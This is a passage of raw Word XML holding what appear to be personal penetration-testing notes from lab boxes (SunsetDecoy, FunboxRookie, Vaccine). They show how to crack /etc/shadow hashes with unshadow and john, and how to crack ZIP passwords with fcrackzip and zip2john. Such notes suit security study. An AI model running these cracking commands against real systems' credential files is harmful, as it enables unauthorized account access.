          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see this output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using default input encoding: UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1165"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">No password hashes loaded (see FAQ)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then try doing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat -A nameOfFile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if there are any like blanks lines the hash.txt file, and remove those</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3176588" cy="772087"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="411" name="image398.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image398.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId610"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3176588" cy="772087"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like here, the second line is a blank line since it starts with "$" which signifies there is text on that line, so remove that blank space</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mh01aga8k16t" w:id="246"/>
      <w:bookmarkEnd w:id="246"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking /etc/passwd and /etc/shadow files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId611">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SunsetDecoy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this box, we got access to a /etc/passwd and /etc/shadow file, but we have no way to extract the encrypted information from it. So, we can crack both files to get plaintext information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can use the unshadow command to get a file format that is compatible with john. First, copy both the /etc/passwd and /etc/shadow into another file, like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user1.pass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and user1.shad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unshadow user1.pass user1.shad &gt; user1.unshadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output user1.unshadow is now in a format that john can crack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john --wordlist=/usr/share/wordlists/rockyou.txt user1.unshadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1067"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Crack the unshadow file, which should give you a list of credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1346200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="310" name="image354.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image354.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61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1DC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="744"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The orange text on the right is the username while the one on the left is password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3g7igz5r9tis" w:id="247"/>
      <w:bookmarkEnd w:id="247"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking Encrypted ZIP Files (ZIP files with passwords)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_l937knob1fv2" w:id="248"/>
      <w:bookmarkEnd w:id="248"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking ZIP files using fcrackzip </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DC9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId613">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">FunboxRookie</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. It's a one-liner method for cracking ZIP files, unlike the zip2john method which is 2 lines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fcrackzip -u -D -v -p /usr/share/wordlists/rockyou.txt file.zip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: "Use unzip to test each password"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells fcrackzip to actually try to unzip the file with each password, not just check it against the hash. This can help avoid false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-D</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: "Use a dictionary attack"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells the tool to use a wordlist (dictionary) instead of brute-forcing all possible character combinations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: "Verbose output"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows progress, including which passwords are being tested. Without this, the output would be quieter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p specifies the path to the wordlist file. In this case, it's the famous rockyou.txt list, which contains millions of commonly used passwords. fcrackzip will try each line in this file as a possible password.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="410" name="image406.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image406.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId614"/>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DD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="591"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what it looks like when it works. The password here is "catwoman"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ii3ou8gbt59" w:id="249"/>
      <w:bookmarkEnd w:id="249"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracking ZIP files using zip2john </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(from Vaccine HTB):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, you get a file that is protected by ZIP. You can convert those ZIP files to hashes, and then use john to crack the hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001DDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You will have to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
